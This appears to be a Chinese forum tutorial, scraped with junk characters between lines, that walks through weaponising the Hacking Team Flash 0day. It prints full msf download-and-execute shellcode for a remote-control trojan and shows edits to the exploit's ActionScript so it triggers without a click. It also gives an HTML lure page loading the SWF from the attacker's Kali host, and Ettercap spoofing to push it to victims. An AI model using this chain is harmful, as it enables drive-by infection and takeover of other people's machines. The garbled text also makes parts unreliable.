|
9 I6 c$ U3 N" S; Q& x3 v. m* V 三、flash 0day之手工代码修改制作下载者实例入侵演示
" h' H# F" L8 H& S+ e) j
4 M- |' L' o; G$ ?$ T2 E
( R1 L# r! k. @. B5 r 利用到的工具:
9 O$ g- H( F$ G8 _$ n% }' V+ X
/ [" Z* ?, ^' i( C( Q1 f6 L2 m6 b& H) u9 J6 s- {; E+ X
Msf
' Z% K: o0 v) z. D
; @6 Z8 B; i+ b9 `
J3 B5 ^) d9 i) I Ettercap
4 J& O! |! n# O4 r. Z# J4 r# `* c/ u* w5 j ' Z( E0 a% g! g7 T j$ r8 @& ?
; Q* f1 `' e Z
Adobe Flash CS6 ) `" g' b6 K! S5 [
6 W3 e% Y" L" [) c! r$ c0 B6 n- r- ?1 N, v C( k
Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份
* I+ @7 R+ X L# v! f& a ) D% Z5 d% W1 j
! D# h( |! J( t$ H) V; q
下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options
1 m" U7 |3 ~3 R- D
9 v0 Z3 E0 @$ [" G) }. o4 |% l+ n. E# ^$ b% y- [2 k
如图:
6 q7 n# J1 L4 ~9 e9 ~5 m 6 V. g& I+ k/ g( j( Y: \' @. |
: Q' k+ ]6 b2 L9 I. r4 T( S- t 4 b' r' R# Q) W. k: e% w
! I4 l; ^# B3 W8 u% h$ e- R
6 l( |0 t4 q1 }6 X
* b* r, B! g- n/ {' m* e+ z
: U' K- w; D8 L( ^, j( s- m2 l
. m+ O' j; c5 Y) j1 o/ F 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: 2 U5 P" i2 r' p0 Z/ M- {. d
6 L0 @; b; h7 g" L
$ x c: i/ G) c4 ?6 C. f+ q. G6 M: f5 c
9 g! T0 ~9 r" z! F# b
. T' b8 d5 r9 t' a7 } M1 H3 o6 u) |5 G0 r( d, o6 m+ Q
6 F- R1 D& j) A/ g# @
2 A& W) {( D$ ?% L6 ]! {5 w M! D' l, i
9 q3 ?, V f; \9 D 然后执行generate -t dword生成shellcode,如下:
- H+ ~# Q# h0 l0 q& Q ; G4 M9 F1 {8 H- B, _& g
/ V9 R, m7 m# M0 r
) r- j' L- h, n4 Z9 {5 q
* Q- Q0 L; X. [5 R% ^0 M2 V; J3 T) `
复制代码到文本下便于我们一会编辑flash exp,如下:
* j& I2 [+ c5 p3 l
' U" v d; {, F, ~0 n) l8 k3 q4 B {/ ~+ |
0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31,
/ |( W ?3 _0 h7 Q
, F, T; T$ q9 `* h# Z3 e. ^9 V7 N, P! e5 i
0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0,
9 f7 d9 C- k: k6 S1 H ( n% M" } d' c( r8 Q$ {
! Y! p( }0 [; E 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, 3 ?; r& o2 M' x, f$ ]1 N6 v/ V8 ^
' @! d; Q$ _, p5 C$ A* r4 ?3 j0 j3 E# d* M
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, 2 N3 [9 b, R$ Y- D! W- z1 I U
7 R: X* I' A( \% P4 f& [) P3 B) V6 X0 w! y# u( _" F+ t
0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854,
! I, h# q" D2 y& d( W
7 p! [. A$ C1 a- V- d2 O' B& z) d; I$ w8 H7 X) r: U: g. n [ v
0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, 2 Q9 _: ?0 g6 Q2 p' T
& y( n2 K! {) ?9 p' z" u1 m9 b1 l, Y& s: a3 ~; `& X; O1 u
0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, & K( F- H, n* y$ [
8 {$ B ~% J8 s- `5 p! a+ {
2 N" H5 x, ^+ X1 J. @ 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757,
. ~6 o' u- N# g: o% C* N( v
$ Z2 x. _( K1 I! D
; n5 t' H: w, u- {& m3 a( @ 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, ( H+ _8 V0 r' b/ k6 L+ d; k9 @2 r
4 U" g; h; r* c' V3 l
, R G2 E3 |9 q% ~* x' U. o( T$ c# X
0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6,
}2 q) A5 K1 e* P + K9 Z. l' p: p
8 u: d R$ l; Z 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, 9 N9 e3 ?: ?1 \9 f
! s% B) y6 \* J: \' I+ {9 b0 B$ b, X U3 W
0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, & L, `- U& j- }, c- j3 Q: b* C! o
. t' L6 l( Z ]* f& f, l
6 N9 R8 D0 F# d; B" J 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973,
; h( \$ l+ [# r4 d/ q
, n8 g' _5 s H" [, o; v6 J$ p/ C' o2 N) h0 [* O3 r
0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000
* Y" m! ^" ] s 2 b; S5 I, C3 O0 i
4 ^* V2 p" r8 q8 N0 u* K& t9 j
3 P5 `+ P3 g& s, {/ V2 f% p ! k/ \1 M3 A/ f. |! \1 T) @
9 Q0 I! e" b7 d2 T 4 i$ Z1 {/ ^" s- H5 {% D
! S" Z( P2 P" ]; D" _. x- {
* \! s3 g1 G" n' [ 下面我们来修改flash 0day exp,需要修改三个文件,分别为:
7 b! ] J; W2 X1 \ " B, D9 x" o! N% U6 K' l+ H/ ]6 t! y& I* t
0 S" C, Y3 `! w3 F5 K- n
8 t6 W! l. H% x& h* g) W
2 \9 M' `. ~9 m2 E" x& h: W, o* o i5 B- q3 B0 R9 @: d' Z
先修改ShellWin32.as,部分源代码如图: ( ]2 x g6 S% C6 D1 E
+ s! Z2 \! a! B* T
4 C. v6 A! w6 R9 Z# I7 l * ^) ~% A6 Z; n- E8 \
8 L/ M$ U* z- s
2 q# V6 t4 a" G9 ] 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下:
7 [) [6 L$ M* g# a$ J
8 E; V: Z5 v/ R
7 }4 E. k2 m7 U# g4 ~6 M; | [ & c0 l4 W, ]) @
% c9 I9 x7 Y W1 _: l4 t$ v! v8 d' v
然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: . L+ k6 y0 f; l5 ^( B" C+ T! D; }+ }
& P) v7 ~: K5 x4 U- p4 J, x' Q+ I0 J# X
" l7 V4 T$ J( K# P+ z0 |
9 c0 n" {' W; d" y( o
( M% c2 p7 ~; n2 } 换行在后面加一句TryExpl();注意是l不是数字1,然后如图:
" u, P' F6 `5 J. y$ B
6 r5 U" \ _. ~6 S$ g# w+ d
- [2 ~2 D6 |- b% K2 O& ~* A . U1 o1 {1 ^) t8 c
) x- c9 F( i; j0 c: L, D
+ \! |. T4 ]: n# z0 ?. _ 4 J4 k4 u8 K% c4 M7 m- {$ S
- S' [! X% g* v' X
c& t& r, ]( Y4 d- O4 G# a- A8 W 1 N2 Z- G, f8 B$ P4 l
. c9 i% O$ {; H( ?) z$ X' R& x8 B0 `, l) m& u) z$ a2 a+ }
然后点保存,下面我们来编译一下,打开
) m- \) ~/ d& F# X, g" @2 n9 I
3 F3 m# c% o2 Z% M& Z% s" t
% x6 Y( c6 k( L$ l M exp1.fla然后点文件-发布,看看编译没错误 5 L" L+ M$ E" O+ ~; S
( {: Q" a0 s6 c
* {0 r2 d- n+ }
$ P; x% O: t( E( q0 [
2 U2 t' M* W! l% N( h. e* B! }. t. Y- K- ~. L8 i" \: x% H- L
\1 U5 K) `& }4 W # y* x; A8 |: D+ ?0 x4 _. ~ y7 W
& H5 j4 x8 g8 C* X- `+ g
3 h. F7 f. d/ L: K9 p
% R/ g+ S+ {4 b9 Z* J+ M7 z9 {" e& k. Q# r
9 H( a2 p# v2 P" J9 I, v! P
( X3 D s- T0 B% o: m: G- q$ j$ a' F2 b/ V9 F& _& x
然后我们把生成的 ]- R9 X* m/ G- g# ?2 k H
4 f- x/ X' H1 s @0 d; @; L4 K& Q
0 }7 g( E: ?0 W* N
exp1.swf丢到kailinux 的/var/www/html下:
$ G" i) o' ?! J6 h- L
. {4 V M; {7 C/ Q! I b. @
. W- v6 a8 v! Q; N9 T 然后把这段代码好好编辑一下
! |% z2 J" E% I
" { G, d2 W2 S$ i) M0 x# ?9 A5 _) X
9 Q2 U- K n% k3 y4 M
' b, R4 H5 V e# ?3 d
$ A2 D6 I- T+ p7 G# K& t$ c- C) c; N0 m" K
% W! }# O! M* N4 Y; l ( s* i& Q5 f- |9 t( q+ r
& q4 s7 p+ N: D
" j9 }* s7 I `: v
$ ^- w3 m0 Q* P5 i
: S6 b. p. {" l& w
' D$ x6 Y( O G" ^6 P4 a) b
/ l, Z* n: o* b2 e8 O$ v- R
3 t3 y* ^4 m" G( d W 5 J( M4 m" H* f; R; X
* m( K: o7 J/ b! L- V: t9 C! Z0 \9 l
) J+ d/ V' s0 i & }6 t* T" J! ]
: ]. n* u) i/ ]% y
1 X- d( p, Z9 ]1 }% g <!DOCTYPE html>
% i) ~ o+ k: {% i, [+ R0 C7 [5 S# P
% H5 p# y& O" l8 e
$ ]1 [8 c* v6 J' M3 E+ q8 m* x <html>
/ [! q5 D. }7 B' g0 j ( o, b m- h5 h c: |! O9 f6 \( ^
- |0 U: b' O! T7 E6 A <head>
8 @: a, k* \! J/ { : v4 \0 s6 E9 Z3 c8 r* ]6 g* f
# d$ ^) H) `6 O q G8 t) Y6 H- W <meta http-equiv="Content-Type" content="text/html; ; A2 F$ [1 _* S% x8 J, h
4 E" ~9 v$ _/ o2 L& P6 k
/ u" J5 G2 n# n' G$ g
charset=utf-8"/>
' K. X3 t. J; v# X2 g ) f6 J5 o: Y( c
u+ j* E u2 S0 _2 ]: A% S </head> ' t1 m) r2 \6 ?& M5 o! }
. f0 Q4 O9 v/ @: E( @% m$ i
1 B5 X2 U8 c! z; Y g <body>
f( u# y$ ^) l; S. J+ Q( t. g0 k
, F( i6 k! o5 [. q, T& `8 d) v5 P$ }3 {* [0 J0 r
<h2> Please wait, the requested page is loading...</h2>
( t7 s# B @( k" p: O 0 y: ^6 ]2 @, b z2 n8 E
1 Y- U0 K' [# r, Z0 @& ^$ [; \
<br>
% ]& K, v: w9 ~# v# J
/ @3 V9 G3 _$ X" w: v3 i
- R d1 N% V2 |* P8 s, H <OBJECT 4 f8 D$ P; c' j( @' H2 e9 J4 ~/ ?
* l0 L8 Y% a: D* R: I* G8 r$ \2 S4 J; p2 E. m+ `8 z, A: Q
classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie . K H `1 C+ o+ k7 c/ [& s0 \) u
) i% ^9 P) w5 Y3 Z$ f9 p, S; X
0 q( i( V* E: ]+ r" m
VALUE="http://192.168.0.109/exp1.swf"></OBJECT>
! ?) v f9 q c0 m1 H% H% P6 t
7 ?! N; ?: T m" E: e3 c8 @: K, A. V3 C, a5 n! V$ @- m
</body>
9 n3 j& q2 V- I; E% _
- v; M1 r7 x5 C( k i: R- W. f8 P% O( L6 \; x3 r
<script>
3 H# \9 v0 x# r! g# l- O
# A. l6 }0 P0 i2 B( f u9 B; Z: K# M) a1 e( a
setTimeout(function () { ! M3 V3 j" }/ d3 x
$ {( z- X2 v9 Z6 \ e' _
! S H2 V: H4 t4 e; Q4 z2 K" y
% M* e! |! V, Z5 P1 R$ V
/ D/ a( b7 Q$ f% f; o/ s' p8 c! r! C
* y1 T0 v$ _1 }4 |; U" j# T window.location.reload(); # u- l( ]* \, o& K# r. q0 s% P. v# q
0 _) G; V* l5 H7 Y
$ }. Y- @3 }1 n% H; c8 ^: m% M
}, 10000); " q; L! \/ ~* m1 L0 j8 L$ X
2 {8 d, o3 u; R: R5 r8 Q8 I, W
" A: T P3 r& ]7 K: F p# Y3 } " F) g" W4 E7 Q ?9 g; t. b
; W3 J' M. ~$ m: O4 k% f
8 Z! `. c- |4 N9 x7 ]) v3 H, ^
</script> $ ?& y# r+ N* ?0 ?
& y* k& R0 W0 v$ J
Y N7 Z5 W* M/ T! r4 O& A, ^ </html> * y0 I9 M; o5 _/ ~0 f* Q: [
2 N! d) V8 }/ ]) b4 T
! G6 Q5 g$ ?0 Z& [5 Z4 ]/ M% S- E
% c+ L! j u6 O 3 |" T5 }4 o: W: h, s" ?' @5 D
, M8 E6 f( [6 t! ]
注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: 7 L2 o. P3 R6 u7 v/ h
3 s( O' S V% H% v$ y) d
! t& H3 R0 J. u
7 ?# [* H6 @; c/ G; o$ j/ |) n $ S% O+ ^: X) U4 e( e5 [. m {
N# W! _8 x$ @
0 J8 a! F9 m; }- _5 D
& [" ?& q G h* m$ \% \# s. |. o0 E3 i/ T, Y
- \$ h7 X5 Q: ?, z 3 R; O& p. O' |5 l* @8 @
, K; i! ^: \ |
6 S& r3 h/ R! c, c% t* H 7 p% {! y. z1 \, ?% [# a" T- Q: K
" a% g& l" g J* Y0 o3 M * z- V5 T; T6 G
' B5 ?+ p" I' f! O: O; C. L. i" m& W& m% c4 \
下面我们用ettercap欺骗如图:
( B* U! B( x0 A+ a h) z 2 D* k% M4 |) T1 Y/ F( Y- A" x& o# q
+ f% m( d2 d6 q3 S; ^ $ l( @3 R# L( {: o0 S" b3 g
( x9 w& W1 G9 @4 V) M# G8 l
. d* ^ D/ w$ B; Q2 s
" F6 d- P( o w1 _4 j* L 7 N' e/ Q" ~- U* d# I3 Y9 e! R
6 D4 [# q$ D( H! q: T& ?9 ]3 x) l% o
下面我们随便访问个网站看看:
( r J$ j2 e! y/ Z
) a! _& l! {$ q3 J3 S3 K$ ?+ ?, V; q0 ]. {
我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图:
3 _$ W1 |7 P5 [ : _: a' ^4 C7 C; H7 ]5 {! L
* u1 p; Q3 G. B6 F% |5 M8 e/ s
! m J6 A0 ?7 w% M+ e2 T
/ x9 {+ Y$ Y6 @1 c; b$ D. R2 W+ S. n9 h
我们看另一台,
4 l0 V8 Z3 M& C% g4 i
6 {+ D p2 F4 b [8 s X. J! E6 ^1 y2 A# Y* Y5 F a% ]" E- {8 B
提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。
+ y0 J' V5 q o, l6 j8 D- V/ \ |